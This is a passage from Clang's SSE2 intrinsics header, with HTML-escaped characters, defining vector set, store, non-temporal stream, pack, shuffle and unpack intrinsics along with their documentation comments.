static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_set_epi8(char __b15, char __b14, char __b13, char __b12, char __b11,
             char __b10, char __b9, char __b8, char __b7, char __b6, char __b5,
             char __b4, char __b3, char __b2, char __b1, char __b0) {
  return __extension__(__m128i)(__v16qi){
      __b0, __b1, __b2,  __b3,  __b4,  __b5,  __b6,  __b7,
      __b8, __b9, __b10, __b11, __b12, __b13, __b14, __b15};
}

/// Initializes both values in a 128-bit integer vector with the
///    specified 64-bit integer value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __q
///    Integer value used to initialize the elements of the destination integer
///    vector.
/// \returns An initialized 128-bit integer vector of [2 x i64] with both
///    elements containing the value provided in the operand.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_set1_epi64x(long long __q) {
  return _mm_set_epi64x(__q, __q);
}

/// Initializes both values in a 128-bit vector of [2 x i64] with the
///    specified 64-bit value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __q
///    A 64-bit value used to initialize the elements of the destination integer
///    vector.
/// \returns An initialized 128-bit vector of [2 x i64] with all elements
///    containing the value provided in the operand.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_set1_epi64(__m64 __q) {
  return _mm_set_epi64(__q, __q);
}

/// Initializes all values in a 128-bit vector of [4 x i32] with the
///    specified 32-bit value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __i
///    A 32-bit value used to initialize the elements of the destination integer
///    vector.
/// \returns An initialized 128-bit vector of [4 x i32] with all elements
///    containing the value provided in the operand.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR _mm_set1_epi32(int __i) {
  return _mm_set_epi32(__i, __i, __i, __i);
}

/// Initializes all values in a 128-bit vector of [8 x i16] with the
///    specified 16-bit value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __w
///    A 16-bit value used to initialize the elements of the destination integer
///    vector.
/// \returns An initialized 128-bit vector of [8 x i16] with all elements
///    containing the value provided in the operand.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_set1_epi16(short __w) {
  return _mm_set_epi16(__w, __w, __w, __w, __w, __w, __w, __w);
}

/// Initializes all values in a 128-bit vector of [16 x i8] with the
///    specified 8-bit value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __b
///    An 8-bit value used to initialize the elements of the destination integer
///    vector.
/// \returns An initialized 128-bit vector of [16 x i8] with all elements
///    containing the value provided in the operand.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR _mm_set1_epi8(char __b) {
  return _mm_set_epi8(__b, __b, __b, __b, __b, __b, __b, __b, __b, __b, __b,
                      __b, __b, __b, __b, __b);
}

/// Constructs a 128-bit integer vector, initialized in reverse order
///     with the specified 64-bit integral values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic does not correspond to a specific instruction.
///
/// \param __q0
///    A 64-bit integral value used to initialize the lower 64 bits of the
///    result.
/// \param __q1
///    A 64-bit integral value used to initialize the upper 64 bits of the
///    result.
/// \returns An initialized 128-bit integer vector.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_setr_epi64(__m64 __q0, __m64 __q1) {
  return _mm_set_epi64(__q1, __q0);
}

/// Constructs a 128-bit integer vector, initialized in reverse order
///     with the specified 32-bit integral values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __i0
///    A 32-bit integral value used to initialize bits [31:0] of the result.
/// \param __i1
///    A 32-bit integral value used to initialize bits [63:32] of the result.
/// \param __i2
///    A 32-bit integral value used to initialize bits [95:64] of the result.
/// \param __i3
///    A 32-bit integral value used to initialize bits [127:96] of the result.
/// \returns An initialized 128-bit integer vector.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_setr_epi32(int __i0, int __i1, int __i2, int __i3) {
  return _mm_set_epi32(__i3, __i2, __i1, __i0);
}

/// Constructs a 128-bit integer vector, initialized in reverse order
///     with the specified 16-bit integral values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __w0
///    A 16-bit integral value used to initialize bits [15:0] of the result.
/// \param __w1
///    A 16-bit integral value used to initialize bits [31:16] of the result.
/// \param __w2
///    A 16-bit integral value used to initialize bits [47:32] of the result.
/// \param __w3
///    A 16-bit integral value used to initialize bits [63:48] of the result.
/// \param __w4
///    A 16-bit integral value used to initialize bits [79:64] of the result.
/// \param __w5
///    A 16-bit integral value used to initialize bits [95:80] of the result.
/// \param __w6
///    A 16-bit integral value used to initialize bits [111:96] of the result.
/// \param __w7
///    A 16-bit integral value used to initialize bits [127:112] of the result.
/// \returns An initialized 128-bit integer vector.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_setr_epi16(short __w0, short __w1, short __w2, short __w3, short __w4,
               short __w5, short __w6, short __w7) {
  return _mm_set_epi16(__w7, __w6, __w5, __w4, __w3, __w2, __w1, __w0);
}

/// Constructs a 128-bit integer vector, initialized in reverse order
///     with the specified 8-bit integral values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __b0
///    An 8-bit integral value used to initialize bits [7:0] of the result.
/// \param __b1
///    An 8-bit integral value used to initialize bits [15:8] of the result.
/// \param __b2
///    An 8-bit integral value used to initialize bits [23:16] of the result.
/// \param __b3
///    An 8-bit integral value used to initialize bits [31:24] of the result.
/// \param __b4
///    An 8-bit integral value used to initialize bits [39:32] of the result.
/// \param __b5
///    An 8-bit integral value used to initialize bits [47:40] of the result.
/// \param __b6
///    An 8-bit integral value used to initialize bits [55:48] of the result.
/// \param __b7
///    An 8-bit integral value used to initialize bits [63:56] of the result.
/// \param __b8
///    An 8-bit integral value used to initialize bits [71:64] of the result.
/// \param __b9
///    An 8-bit integral value used to initialize bits [79:72] of the result.
/// \param __b10
///    An 8-bit integral value used to initialize bits [87:80] of the result.
/// \param __b11
///    An 8-bit integral value used to initialize bits [95:88] of the result.
/// \param __b12
///    An 8-bit integral value used to initialize bits [103:96] of the result.
/// \param __b13
///    An 8-bit integral value used to initialize bits [111:104] of the result.
/// \param __b14
///    An 8-bit integral value used to initialize bits [119:112] of the result.
/// \param __b15
///    An 8-bit integral value used to initialize bits [127:120] of the result.
/// \returns An initialized 128-bit integer vector.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_setr_epi8(char __b0, char __b1, char __b2, char __b3, char __b4, char __b5,
              char __b6, char __b7, char __b8, char __b9, char __b10,
              char __b11, char __b12, char __b13, char __b14, char __b15) {
  return _mm_set_epi8(__b15, __b14, __b13, __b12, __b11, __b10, __b9, __b8,
                      __b7, __b6, __b5, __b4, __b3, __b2, __b1, __b0);
}

/// Creates a 128-bit integer vector initialized to zero.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VXORPS / XORPS &lt;/c&gt; instruction.
///
/// \returns An initialized 128-bit integer vector with all elements set to
///    zero.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR _mm_setzero_si128(void) {
  return __extension__(__m128i)(__v2di){0LL, 0LL};
}

/// Stores a 128-bit integer vector to a memory location aligned on a
///    128-bit boundary.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVAPS / MOVAPS &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to an aligned memory location that will receive the integer
///    values.
/// \param __b
///    A 128-bit integer vector containing the values to be moved.
static __inline__ void __DEFAULT_FN_ATTRS _mm_store_si128(__m128i *__p,
                                                          __m128i __b) {
  *__p = __b;
}

/// Stores a 128-bit integer vector to an unaligned memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVUPS / MOVUPS &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to a memory location that will receive the integer values.
/// \param __b
///    A 128-bit integer vector containing the values to be moved.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storeu_si128(__m128i_u *__p,
                                                           __m128i __b) {
  struct __storeu_si128 {
    __m128i_u __v;
  } __attribute__((__packed__, __may_alias__));
  ((struct __storeu_si128 *)__p)-&gt;__v = __b;
}

/// Stores a 64-bit integer value from the low element of a 128-bit integer
///    vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVQ / MOVQ &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to a 64-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \param __b
///    A 128-bit integer vector containing the value to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storeu_si64(void *__p,
                                                          __m128i __b) {
  struct __storeu_si64 {
    long long __v;
  } __attribute__((__packed__, __may_alias__));
  ((struct __storeu_si64 *)__p)-&gt;__v = ((__v2di)__b)[0];
}

/// Stores a 32-bit integer value from the low element of a 128-bit integer
///    vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVD / MOVD &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to a 32-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \param __b
///    A 128-bit integer vector containing the value to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storeu_si32(void *__p,
                                                          __m128i __b) {
  struct __storeu_si32 {
    int __v;
  } __attribute__((__packed__, __may_alias__));
  ((struct __storeu_si32 *)__p)-&gt;__v = ((__v4si)__b)[0];
}

/// Stores a 16-bit integer value from the low element of a 128-bit integer
///    vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic does not correspond to a specific instruction.
///
/// \param __p
///    A pointer to a 16-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \param __b
///    A 128-bit integer vector containing the value to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storeu_si16(void *__p,
                                                          __m128i __b) {
  struct __storeu_si16 {
    short __v;
  } __attribute__((__packed__, __may_alias__));
  ((struct __storeu_si16 *)__p)-&gt;__v = ((__v8hi)__b)[0];
}

/// Moves bytes selected by the mask from the first operand to the
///    specified unaligned memory location. When a mask bit is 1, the
///    corresponding byte is written, otherwise it is not written.
///
///    To minimize caching, the data is flagged as non-temporal (unlikely to be
///    used again soon). Exception and trap behavior for elements not selected
///    for storage to memory are implementation dependent.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMASKMOVDQU / MASKMOVDQU &lt;/c&gt;
///   instruction.
///
/// \param __d
///    A 128-bit integer vector containing the values to be moved.
/// \param __n
///    A 128-bit integer vector containing the mask. The most significant bit of
///    each byte represents the mask bits.
/// \param __p
///    A pointer to an unaligned 128-bit memory location where the specified
///    values are moved.
static __inline__ void __DEFAULT_FN_ATTRS _mm_maskmoveu_si128(__m128i __d,
                                                              __m128i __n,
                                                              char *__p) {
  __builtin_ia32_maskmovdqu((__v16qi)__d, (__v16qi)__n, __p);
}

/// Stores the lower 64 bits of a 128-bit integer vector of [2 x i64] to
///    a memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVLPS / MOVLPS &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to a 64-bit memory location that will receive the lower 64 bits
///    of the integer vector parameter.
/// \param __a
///    A 128-bit integer vector of [2 x i64]. The lower 64 bits contain the
///    value to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_storel_epi64(__m128i_u *__p,
                                                           __m128i __a) {
  struct __mm_storel_epi64_struct {
    long long __u;
  } __attribute__((__packed__, __may_alias__));
  ((struct __mm_storel_epi64_struct *)__p)-&gt;__u = __a[0];
}

/// Stores a 128-bit floating point vector of [2 x double] to a 128-bit
///    aligned memory location.
///
///    To minimize caching, the data is flagged as non-temporal (unlikely to be
///    used again soon).
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVNTPS / MOVNTPS &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to the 128-bit aligned memory location used to store the value.
/// \param __a
///    A vector of [2 x double] containing the 64-bit values to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_stream_pd(void *__p,
                                                        __m128d __a) {
  __builtin_nontemporal_store((__v2df)__a, (__v2df *)__p);
}

/// Stores a 128-bit integer vector to a 128-bit aligned memory location.
///
///    To minimize caching, the data is flagged as non-temporal (unlikely to be
///    used again soon).
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVNTPS / MOVNTPS &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to the 128-bit aligned memory location used to store the value.
/// \param __a
///    A 128-bit integer vector containing the values to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_stream_si128(void *__p,
                                                           __m128i __a) {
  __builtin_nontemporal_store((__v2di)__a, (__v2di *)__p);
}

/// Stores a 32-bit integer value in the specified memory location.
///
///    To minimize caching, the data is flagged as non-temporal (unlikely to be
///    used again soon).
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; MOVNTI &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to the 32-bit memory location used to store the value.
/// \param __a
///    A 32-bit integer containing the value to be stored.
static __inline__ void
    __attribute__((__always_inline__, __nodebug__, __target__(&quot;sse2&quot;)))
    _mm_stream_si32(void *__p, int __a) {
  __builtin_ia32_movnti((int *)__p, __a);
}

#ifdef __x86_64__
/// Stores a 64-bit integer value in the specified memory location.
///
///    To minimize caching, the data is flagged as non-temporal (unlikely to be
///    used again soon).
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; MOVNTIQ &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to the 64-bit memory location used to store the value.
/// \param __a
///    A 64-bit integer containing the value to be stored.
static __inline__ void
    __attribute__((__always_inline__, __nodebug__, __target__(&quot;sse2&quot;)))
    _mm_stream_si64(void *__p, long long __a) {
  __builtin_ia32_movnti64((long long *)__p, __a);
}
#endif

#if defined(__cplusplus)
extern &quot;C&quot; {
#endif

/// The cache line containing \a __p is flushed and invalidated from all
///    caches in the coherency domain.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; CLFLUSH &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to the memory location used to identify the cache line to be
///    flushed.
void _mm_clflush(void const *__p);

/// Forces strong memory ordering (serialization) between load
///    instructions preceding this instruction and load instructions following
///    this instruction, ensuring the system completes all previous loads before
///    executing subsequent loads.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; LFENCE &lt;/c&gt; instruction.
///
void _mm_lfence(void);

/// Forces strong memory ordering (serialization) between load and store
///    instructions preceding this instruction and load and store instructions
///    following this instruction, ensuring that the system completes all
///    previous memory accesses before executing subsequent memory accesses.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; MFENCE &lt;/c&gt; instruction.
///
void _mm_mfence(void);

#if defined(__cplusplus)
} // extern &quot;C&quot;
#endif

/// Converts, with saturation, 16-bit signed integers from both 128-bit integer
///    vector operands into 8-bit signed integers, and packs the results into
///    the destination.
///
///    Positive values greater than 0x7F are saturated to 0x7F. Negative values
///    less than 0x80 are saturated to 0x80.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPACKSSWB / PACKSSWB &lt;/c&gt; instruction.
///
/// \param __a
///   A 128-bit integer vector of [8 x i16]. The converted [8 x i8] values are
///   written to the lower 64 bits of the result.
/// \param __b
///   A 128-bit integer vector of [8 x i16]. The converted [8 x i8] values are
///   written to the higher 64 bits of the result.
/// \returns A 128-bit vector of [16 x i8] containing the converted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_packs_epi16(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)__builtin_ia32_packsswb128((__v8hi)__a, (__v8hi)__b);
}

/// Converts, with saturation, 32-bit signed integers from both 128-bit integer
///    vector operands into 16-bit signed integers, and packs the results into
///    the destination.
///
///    Positive values greater than 0x7FFF are saturated to 0x7FFF. Negative
///    values less than 0x8000 are saturated to 0x8000.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPACKSSDW / PACKSSDW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector of [4 x i32]. The converted [4 x i16] values
///    are written to the lower 64 bits of the result.
/// \param __b
///    A 128-bit integer vector of [4 x i32]. The converted [4 x i16] values
///    are written to the higher 64 bits of the result.
/// \returns A 128-bit vector of [8 x i16] containing the converted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_packs_epi32(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)__builtin_ia32_packssdw128((__v4si)__a, (__v4si)__b);
}

/// Converts, with saturation, 16-bit signed integers from both 128-bit integer
///    vector operands into 8-bit unsigned integers, and packs the results into
///    the destination.
///
///    Values greater than 0xFF are saturated to 0xFF. Values less than 0x00
///    are saturated to 0x00.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPACKUSWB / PACKUSWB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector of [8 x i16]. The converted [8 x i8] values are
///    written to the lower 64 bits of the result.
/// \param __b
///    A 128-bit integer vector of [8 x i16]. The converted [8 x i8] values are
///    written to the higher 64 bits of the result.
/// \returns A 128-bit vector of [16 x i8] containing the converted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_packus_epi16(__m128i __a,
                                                              __m128i __b) {
  return (__m128i)__builtin_ia32_packuswb128((__v8hi)__a, (__v8hi)__b);
}

/// Extracts 16 bits from a 128-bit integer vector of [8 x i16], using
///    the immediate-value parameter as a selector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128i _mm_extract_epi16(__m128i a, const int imm);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VPEXTRW / PEXTRW &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit integer vector.
/// \param imm
///    An immediate value. Bits [2:0] selects values from \a a to be assigned
///    to bits[15:0] of the result. \n
///    000: assign values from bits [15:0] of \a a. \n
///    001: assign values from bits [31:16] of \a a. \n
///    010: assign values from bits [47:32] of \a a. \n
///    011: assign values from bits [63:48] of \a a. \n
///    100: assign values from bits [79:64] of \a a. \n
///    101: assign values from bits [95:80] of \a a. \n
///    110: assign values from bits [111:96] of \a a. \n
///    111: assign values from bits [127:112] of \a a.
/// \returns An integer, whose lower 16 bits are selected from the 128-bit
///    integer vector parameter and the remaining bits are assigned zeros.
#define _mm_extract_epi16(a, imm)                                              \
  ((int)(unsigned short)__builtin_ia32_vec_ext_v8hi((__v8hi)(__m128i)(a),      \
                                                    (int)(imm)))

/// Constructs a 128-bit integer vector by first making a copy of the
///    128-bit integer vector parameter, and then inserting the lower 16 bits
///    of an integer parameter into an offset specified by the immediate-value
///    parameter.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128i _mm_insert_epi16(__m128i a, int b, const int imm);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VPINSRW / PINSRW &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit integer vector of [8 x i16]. This vector is copied to the
///    result and then one of the eight elements in the result is replaced by
///    the lower 16 bits of \a b.
/// \param b
///    An integer. The lower 16 bits of this parameter are written to the
///    result beginning at an offset specified by \a imm.
/// \param imm
///    An immediate value specifying the bit offset in the result at which the
///    lower 16 bits of \a b are written.
/// \returns A 128-bit integer vector containing the constructed values.
#define _mm_insert_epi16(a, b, imm)                                            \
  ((__m128i)__builtin_ia32_vec_set_v8hi((__v8hi)(__m128i)(a), (int)(b),        \
                                        (int)(imm)))

/// Copies the values of the most significant bits from each 8-bit
///    element in a 128-bit integer vector of [16 x i8] to create a 16-bit mask
///    value, zero-extends the value, and writes it to the destination.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPMOVMSKB / PMOVMSKB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the values with bits to be extracted.
/// \returns The most significant bits from each 8-bit element in \a __a,
///    written to bits [15:0]. The other bits are assigned zeros.
static __inline__ int __DEFAULT_FN_ATTRS _mm_movemask_epi8(__m128i __a) {
  return __builtin_ia32_pmovmskb128((__v16qi)__a);
}

/// Constructs a 128-bit integer vector by shuffling four 32-bit
///    elements of a 128-bit integer vector parameter, using the immediate-value
///    parameter as a specifier.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128i _mm_shuffle_epi32(__m128i a, const int imm);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VPSHUFD / PSHUFD &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit integer vector containing the values to be copied.
/// \param imm
///    An immediate value containing an 8-bit value specifying which elements to
///    copy from a. The destinations within the 128-bit destination are assigned
///    values as follows: \n
///    Bits [1:0] are used to assign values to bits [31:0] of the result. \n
///    Bits [3:2] are used to assign values to bits [63:32] of the result. \n
///    Bits [5:4] are used to assign values to bits [95:64] of the result. \n
///    Bits [7:6] are used to assign values to bits [127:96] of the result. \n
///    Bit value assignments: \n
///    00: assign values from bits [31:0] of \a a. \n
///    01: assign values from bits [63:32] of \a a. \n
///    10: assign values from bits [95:64] of \a a. \n
///    11: assign values from bits [127:96] of \a a. \n
///    Note: To generate a mask, you can use the \c _MM_SHUFFLE macro.
///    &lt;c&gt;_MM_SHUFFLE(b6, b4, b2, b0)&lt;/c&gt; can create an 8-bit mask of the form
///    &lt;c&gt;[b6, b4, b2, b0]&lt;/c&gt;.
/// \returns A 128-bit integer vector containing the shuffled values.
#define _mm_shuffle_epi32(a, imm)                                              \
  ((__m128i)__builtin_ia32_pshufd((__v4si)(__m128i)(a), (int)(imm)))

/// Constructs a 128-bit integer vector by shuffling four lower 16-bit
///    elements of a 128-bit integer vector of [8 x i16], using the immediate
///    value parameter as a specifier.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128i _mm_shufflelo_epi16(__m128i a, const int imm);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VPSHUFLW / PSHUFLW &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit integer vector of [8 x i16]. Bits [127:64] are copied to bits
///    [127:64] of the result.
/// \param imm
///    An 8-bit immediate value specifying which elements to copy from \a a. \n
///    Bits[1:0] are used to assign values to bits [15:0] of the result. \n
///    Bits[3:2] are used to assign values to bits [31:16] of the result. \n
///    Bits[5:4] are used to assign values to bits [47:32] of the result. \n
///    Bits[7:6] are used to assign values to bits [63:48] of the result. \n
///    Bit value assignments: \n
///    00: assign values from bits [15:0] of \a a. \n
///    01: assign values from bits [31:16] of \a a. \n
///    10: assign values from bits [47:32] of \a a. \n
///    11: assign values from bits [63:48] of \a a. \n
///    Note: To generate a mask, you can use the \c _MM_SHUFFLE macro.
///    &lt;c&gt;_MM_SHUFFLE(b6, b4, b2, b0)&lt;/c&gt; can create an 8-bit mask of the form
///    &lt;c&gt;[b6, b4, b2, b0]&lt;/c&gt;.
/// \returns A 128-bit integer vector containing the shuffled values.
#define _mm_shufflelo_epi16(a, imm)                                            \
  ((__m128i)__builtin_ia32_pshuflw((__v8hi)(__m128i)(a), (int)(imm)))

/// Constructs a 128-bit integer vector by shuffling four upper 16-bit
///    elements of a 128-bit integer vector of [8 x i16], using the immediate
///    value parameter as a specifier.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128i _mm_shufflehi_epi16(__m128i a, const int imm);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VPSHUFHW / PSHUFHW &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit integer vector of [8 x i16]. Bits [63:0] are copied to bits
///    [63:0] of the result.
/// \param imm
///    An 8-bit immediate value specifying which elements to copy from \a a. \n
///    Bits[1:0] are used to assign values to bits [79:64] of the result. \n
///    Bits[3:2] are used to assign values to bits [95:80] of the result. \n
///    Bits[5:4] are used to assign values to bits [111:96] of the result. \n
///    Bits[7:6] are used to assign values to bits [127:112] of the result. \n
///    Bit value assignments: \n
///    00: assign values from bits [79:64] of \a a. \n
///    01: assign values from bits [95:80] of \a a. \n
///    10: assign values from bits [111:96] of \a a. \n
///    11: assign values from bits [127:112] of \a a. \n
///    Note: To generate a mask, you can use the \c _MM_SHUFFLE macro.
///    &lt;c&gt;_MM_SHUFFLE(b6, b4, b2, b0)&lt;/c&gt; can create an 8-bit mask of the form
///    &lt;c&gt;[b6, b4, b2, b0]&lt;/c&gt;.
/// \returns A 128-bit integer vector containing the shuffled values.
#define _mm_shufflehi_epi16(a, imm)                                            \
  ((__m128i)__builtin_ia32_pshufhw((__v8hi)(__m128i)(a), (int)(imm)))

/// Unpacks the high-order (index 8-15) values from two 128-bit vectors
///    of [16 x i8] and interleaves them into a 128-bit vector of [16 x i8].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKHBW / PUNPCKHBW &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [16 x i8].
///    Bits [71:64] are written to bits [7:0] of the result. \n
///    Bits [79:72] are written to bits [23:16] of the result. \n
///    Bits [87:80] are written to bits [39:32] of the result. \n
///    Bits [95:88] are written to bits [55:48] of the result. \n
///    Bits [103:96] are written to bits [71:64] of the result. \n
///    Bits [111:104] are written to bits [87:80] of the result. \n
///    Bits [119:112] are written to bits [103:96] of the result. \n
///    Bits [127:120] are written to bits [119:112] of the result.
/// \param __b
///    A 128-bit vector of [16 x i8]. \n
///    Bits [71:64] are written to bits [15:8] of the result. \n
///    Bits [79:72] are written to bits [31:24] of the result. \n
///    Bits [87:80] are written to bits [47:40] of the result. \n
///    Bits [95:88] are written to bits [63:56] of the result. \n
///    Bits [103:96] are written to bits [79:72] of the result. \n
///    Bits [111:104] are written to bits [95:88] of the result. \n
///    Bits [119:112] are written to bits [111:104] of the result. \n
///    Bits [127:120] are written to bits [127:120] of the result.
/// \returns A 128-bit vector of [16 x i8] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpackhi_epi8(__m128i __a,
                                                               __m128i __b) {
  return (__m128i)__builtin_shufflevector(
      (__v16qi)__a, (__v16qi)__b, 8, 16 + 8, 9, 16 + 9, 10, 16 + 10, 11,
      16 + 11, 12, 16 + 12, 13, 16 + 13, 14, 16 + 14, 15, 16 + 15);
}

/// Unpacks the high-order (index 4-7) values from two 128-bit vectors of
///    [8 x i16] and interleaves them into a 128-bit vector of [8 x i16].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKHWD / PUNPCKHWD &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [8 x i16].
///    Bits [79:64] are written to bits [15:0] of the result. \n
///    Bits [95:80] are written to bits [47:32] of the result. \n
///    Bits [111:96] are written to bits [79:64] of the result. \n
///    Bits [127:112] are written to bits [111:96] of the result.
/// \param __b
///    A 128-bit vector of [8 x i16].
///    Bits [79:64] are written to bits [31:16] of the result. \n
///    Bits [95:80] are written to bits [63:48] of the result. \n
///    Bits [111:96] are written to bits [95:80] of the result. \n
///    Bits [127:112] are written to bits [127:112] of the result.
/// \returns A 128-bit vector of [8 x i16] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpackhi_epi16(__m128i __a,
                                                                __m128i __b) {
  return (__m128i)__builtin_shufflevector((__v8hi)__a, (__v8hi)__b, 4, 8 + 4, 5,
                                          8 + 5, 6, 8 + 6, 7, 8 + 7);
}

/// Unpacks the high-order (index 2,3) values from two 128-bit vectors of
///    [4 x i32] and interleaves them into a 128-bit vector of [4 x i32].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKHDQ / PUNPCKHDQ &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [4 x i32]. \n
///    Bits [95:64] are written to bits [31:0] of the destination. \n
///    Bits [127:96] are written to bits [95:64] of the destination.
/// \param __b
///    A 128-bit vector of [4 x i32]. \n
///    Bits [95:64] are written to bits [64:32] of the destination. \n
///    Bits [127:96] are written to bits [127:96] of the destination.
/// \returns A 128-bit vector of [4 x i32] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpackhi_epi32(__m128i __a,
                                                                __m128i __b) {
  return (__m128i)__builtin_shufflevector((__v4si)__a, (__v4si)__b, 2, 4 + 2, 3,
                                          4 + 3);
}

/// Unpacks the high-order 64-bit elements from two 128-bit vectors of
///    [2 x i64] and interleaves them into a 128-bit vector of [2 x i64].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKHQDQ / PUNPCKHQDQ &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [2 x i64]. \n
